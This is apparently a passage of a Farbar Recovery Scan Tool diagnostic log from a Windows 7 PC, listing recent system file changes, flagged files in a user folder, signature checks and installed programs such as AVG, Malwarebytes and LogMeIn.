2014-10-15 13:53 - 2014-07-06 20:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-10-15 13:53 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2014-10-15 13:53 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2014-10-15 13:53 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2014-10-15 13:53 - 2014-06-27 19:21 - 00619056 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-15 13:53 - 2014-06-27 19:21 - 00532176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-15 13:53 - 2014-06-27 19:21 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-15 13:52 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-15 13:52 - 2014-10-06 21:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-15 13:52 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-15 13:52 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-15 13:52 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-15 13:52 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-15 13:52 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-15 13:52 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-15 13:52 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-15 13:52 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-15 13:52 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-15 13:52 - 2014-09-18 20:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-15 13:52 - 2014-09-18 20:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-15 13:52 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-15 13:52 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-15 13:52 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-15 13:52 - 2014-09-18 20:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-15 13:52 - 2014-09-18 20:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-15 13:52 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-15 13:52 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-15 13:52 - 2014-09-18 20:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-15 13:52 - 2014-09-18 20:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-15 13:52 - 2014-09-18 20:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-15 13:52 - 2014-09-18 20:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-15 13:52 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-15 13:52 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-15 13:52 - 2014-09-18 20:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-15 13:52 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-15 13:52 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-15 13:52 - 2014-09-18 20:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-15 13:52 - 2014-09-18 20:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-15 13:52 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-15 13:52 - 2014-09-18 20:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-15 13:52 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-15 13:52 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-15 13:52 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-15 13:52 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-15 13:52 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-15 13:52 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-15 13:52 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-15 13:52 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-15 13:52 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-15 13:52 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-15 13:52 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-15 13:52 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-15 13:52 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-15 13:52 - 2014-09-18 19:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-15 13:52 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-15 13:52 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-15 13:52 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-15 13:52 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-15 13:52 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-15 13:52 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-15 13:52 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-15 13:52 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-15 13:52 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-15 13:52 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-15 13:52 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-15 13:52 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-15 13:52 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-15 13:52 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-15 13:52 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-15 13:52 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-15 13:52 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-15 13:52 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-15 13:52 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-15 13:52 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-15 13:51 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-15 13:51 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-02 15:02 - 2014-06-28 15:22 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-11-02 14:29 - 2011-11-26 19:42 - 01202255 _____ () C:\Windows\WindowsUpdate.log
2014-11-02 11:34 - 2012-08-08 23:01 - 00000000 ____D () C:\Users\Deborah\AppData\Local\CrashDumps
2014-11-02 11:24 - 2012-02-12 01:06 - 00000000 ____D () C:\ProgramData\MFAData
2014-11-02 07:51 - 2013-07-10 12:18 - 00000000 ____D () C:\ProgramData\LogMeIn
2014-11-01 15:02 - 2012-02-11 21:13 - 00000528 _____ () C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job
2014-11-01 15:01 - 2012-02-11 21:13 - 00003498 _____ () C:\Windows\System32\Tasks\SystemToolsDailyTest
2014-11-01 15:01 - 2012-02-11 21:13 - 00003448 _____ () C:\Windows\System32\Tasks\PCDEventLauncher
2014-11-01 15:01 - 2012-02-11 21:13 - 00000466 _____ () C:\Windows\Tasks\SystemToolsDailyTest.job
2014-10-31 05:38 - 2009-07-13 23:45 - 00031296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-31 05:38 - 2009-07-13 23:45 - 00031296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-31 05:37 - 2009-07-14 00:13 - 00786662 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-31 05:32 - 2014-01-21 14:19 - 00001015 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Client.lnk
2014-10-31 05:32 - 2014-01-21 14:19 - 00000999 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Control Panel.lnk
2014-10-31 05:31 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-31 05:03 - 2013-07-10 12:22 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-10-31 04:59 - 2011-11-26 20:04 - 00000000 ____D () C:\Program Files\Google
2014-10-31 04:59 - 2011-11-26 20:03 - 00000000 ____D () C:\Program Files (x86)\Google
2014-10-31 04:23 - 2012-02-11 21:25 - 00000000 ____D () C:\Users\Deborah\AppData\Local\Google
2014-10-31 04:23 - 2011-11-26 20:04 - 00000000 ____D () C:\ProgramData\Google
2014-10-27 11:35 - 2014-06-28 15:22 - 00001113 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-27 11:35 - 2014-06-28 15:22 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-27 11:35 - 2014-06-28 15:22 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-21 09:54 - 2012-02-12 01:08 - 00000000 ____D () C:\Program Files (x86)\AVG
2014-10-21 09:53 - 2014-03-31 08:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-10-21 09:53 - 2012-07-23 09:18 - 00000000 ___HD () C:\$AVG
2014-10-16 08:33 - 2009-07-13 23:57 - 00001547 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-10-16 03:10 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-16 02:33 - 2009-07-13 23:45 - 00455760 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 02:30 - 2014-05-07 02:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-16 02:30 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism
2014-10-16 02:30 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Dism
2014-10-16 02:07 - 2014-06-28 15:03 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-16 02:00 - 2012-02-11 22:10 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

Files to move or delete:
====================
C:\Users\Deborah\en_res.dll
C:\Users\Deborah\es_res.dll
C:\Users\Deborah\fr_res.dll
C:\Users\Deborah\g2ax_customer_downloadhelper_win32_x86.exe
C:\Users\Deborah\grm_res.dll
C:\Users\Deborah\it_res.dll
C:\Users\Deborah\jp_res.dll
C:\Users\Deborah\mfc80u.dll
C:\Users\Deborah\msvcr80.dll
C:\Users\Deborah\PCPE Setup.exe
C:\Users\Deborah\pt_res.dll
C:\Users\Deborah\ResourceReader.dll
C:\Users\Deborah\ru_res.dll
C:\Users\Deborah\zh_res.dll


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-10-25 23:54

==================== End Of Log ============================

 

Additional.txt

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-11-2014
Ran by Deborah at 2014-11-02 15:21:06
Running from C:\Users\Deborah\Downloads
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Access Help (HKLM-x32\...\{C6FA39A7-26B1-480A-BC74-6D17531AC222}) (Version: 2.00 - Lenovo)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Flash Player 10 Plugin (HKLM-x32\...\{0DFB3DE8-65B9-44FF-AA0A-3BECC5A2BFD1}) (Version: 10.0.32.18 - Adobe Systems, Inc.)
Adobe Flash Player 12 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 12.0.0.44 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5315 - AVG Technologies)
AVG 2015 (Version: 15.0.4189 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5315 - AVG Technologies) Hidden
AVG Security Toolbar (HKLM-x32\...\AVG Secure Search) (Version: 18.1.9.799 - AVG Technologies)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.4.1.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version:  - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.2.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version:  - Canon Inc.)
Canon MX920 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX920_series) (Version: 1.00 - Canon Inc.)
Canon MX920 series On-screen Manual (HKLM-x32\...\Canon MX920 series On-screen Manual) (Version: 7.6.0 - Canon Inc.)
Canon MX920 series User Registration (HKLM-x32\...\Canon MX920 series User Registration) (Version:  - ‭Canon Inc.)
Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 1.1.0 - Canon Inc.)
Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 1.0.1 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.1.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.1.0 - Canon Inc.)
Canon Speed Dial Utility (HKLM-x32\...\Speed Dial Utility) (Version: 1.3.0 - Canon Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 3.15 - Piriform)
Citrix Presentation Server Client - Web Only (HKLM-x32\...\{E9459BCF-0982-498B-ABA7-26C34323493F}) (Version: 10.200.2650 - Citrix Systems, Inc.)
Create Recovery Media (HKLM-x32\...\{50DC5136-21E8-48BC-97E5-1AD055F6B0B6}) (Version: 1.20.0.00 - Lenovo Group Limited)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DirectX 9 Runtime (x32 Version: 1.00.0000 - Sonic Solutions) Hidden
D-Link DWA-125 (HKLM-x32\...\{E45CACFE-0576-4375-A84F-C34B99A7B652}) (Version:  - D-Link)
EaseUS Todo Backup Free 4.0 (HKLM-x32\...\EaseUS Todo Backup Free 4.0_is1) (Version: 4.0.0.1 - CHENGDU YIWO Tech Development Co., Ltd)
Free PDF to Word Converter 5.1.0.383 (HKLM\...\Free PDF to Word Converter_is1) (Version: 5.1.0.383 - Smart Soft)
GoToAssist Customer 2.2.0.758 (HKLM-x32\...\GoToAssist Express Customer) (Version: 2.2.0.758 - Citrix Online)
HP Officejet 6500 E710a-f Basic Device Software (HKLM\...\{EC21DBC6-C760-463D-8866-BFACBB28A3E3}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Officejet 6500 E710a-f Help (HKLM-x32\...\{037CD593-D760-4A00-B030-7BBAFA1123FE}) (Version: 140.0.2.2 - Hewlett Packard)
HP Officejet 6500 E710n-z Basic Device Software (HKLM\...\{ADDF4B84-5D28-4EAE-8511-EF808C8BC81C}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Officejet 6500 E710n-z Help (HKLM-x32\...\{130E5108-547F-4482-91EE-F45C784E08C7}) (Version: 140.0.2.2 - Hewlett Packard)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1872 - Intel Corporation)
Intel® Management Engine Interface (HKLM\...\HECI) (Version:  - Intel Corporation)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 14.5 - Intel)
Intel® Active Management Technology (HKLM\...\MESOL) (Version:  - Intel Corporation)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lenovo Mouse Suite (HKLM\...\MouseSuite98) (Version: 6.45 - Lenovo)
Lenovo Registration (HKLM-x32\...\{6707C034-ED6B-4B6A-B21F-969B3606FBDE}) (Version: 1.0.4 - Lenovo Inc.)
Lenovo ThinkVantage Toolbox (HKLM\...\PC-Doctor for Windows) (Version: 6.0.5849.23 - PC-Doctor, Inc.)
Lenovo Welcome (HKLM-x32\...\Lenovo Welcome_is1) (Version: 2.02.003.0 - Lenovo)
LogMeIn (HKLM-x32\...\{CB7AF84A-1B7F-4C6B-8A58-EB7CDE48C23A}) (Version: 4.1.3268 - LogMeIn, Inc.)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Message Center Plus (HKLM-x32\...\{FD331A3B-F7A5-4C31-B8D4-DF413C85AF7A}) (Version: 2.0.0012.00 - Lenovo Group Limited)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Standard 2010 (HKLM\...\Office14.STANDARDR) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.50401.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.2.3 - Frank Heindörfer, Philip Chinery)
PowerChute Personal Edition 3.0.2 (HKLM-x32\...\{8ED262EE-FC73-47A9-BB86-D92223246881}) (Version: 3.0.2 - Schneider Electric)
Rescue and Recovery (HKLM-x32\...\{B383F243-0ABC-4E56-AA30-923B8D85076E}) (Version: 4.30.0025.00 - Lenovo Group Limited)
Roxio Creator Business Edition (HKLM-x32\...\{537BF16E-7412-448C-95D8-846E85A1D817}) (Version: 10.3 - Roxio)
Sonic CinePlayer Decoder Pack (x32 Version: 4.3.0 - Sonic Solutions) Hidden
Sonic Icons for Lenovo (HKLM-x32\...\{B334D9AE-1393-423E-97C0-3BDC3360E692}) (Version: 2.0.0 - Lenovo)
SoundMAX (HKLM-x32\...\{F0A37341-D692-11D4-A984-009027EC0A9C}) (Version: 6.10.2.6595 - Analog Devices)
System Update (HKLM-x32\...\{25C64847-B900-48AD-A164-1B4F9B774650}) (Version: 4.01.0015 - Lenovo)
ThinkVantage Power Manager (HKLM-x32\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 1.04.0023 - Lenovo Group Limited)
TotalMD 2011 SP2 (HKLM-x32\...\TotalMD For Networks_is1) (Version:  - Dentimax, LLC)
VD64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
Visual Studio 2008 x64 Redistributables (HKLM-x32\...\{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}) (Version: 10.0.0.2 - AVG Technologies)
Visual Studio 2010 x64 Redistributables (HKLM\...\{21B133D6-5979-47F0-BE1C-F6A6B304693F}) (Version: 13.0.0.1 - AVG Technologies)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Automated Installation Kit (HKLM\...\{31E8F586-4EF7-4500-844D-BA8756474FF1}) (Version: 2.0.0.0 - Microsoft Corporation)
Windows Driver Package - AnalogDevices (ADIHdAudAddService) MEDIA  (08/05/2009 6.10.02.6595) (HKLM\...\A5711FCDB123FDFC12A06CDCA7EA8C60F8370DC5) (Version: 08/05/2009 6.10.02.6595 - AnalogDevices)
Windows Driver Package - Intel (e1kexpress) Net  (06/22/2009 11.0.41.0) (HKLM\...\47953DA64A58724946E1C1EAFF72D4D6138B69F9) (Version: 06/22/2009 11.0.41.0 - Intel)
Windows Driver Package - Intel (HECIx64) System  (06/23/2009 5.2.0.1008) (HKLM\...\4CF241D8BEE94EE801F312E8B49B8E5BAA90F29A) (Version: 06/23/2009 5.2.0.1008 - Intel)
Windows Driver Package - Intel (Serial) Ports  (07/06/2009 5.5.1.1012) (HKLM\...\49AA6E0E36A92D25AFC2479DC7BCB705AE01CE1F) (Version: 07/06/2009 5.5.1.1012 - Intel)
Windows Driver Package - Intel Corporation (igfx) Display  (08/13/2009 8.15.10.1872) (HKLM\...\157624FFB8919EB5518C572408100A734456F2E0) (Version: 08/13/2009 8.15.10.1872 - Intel Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

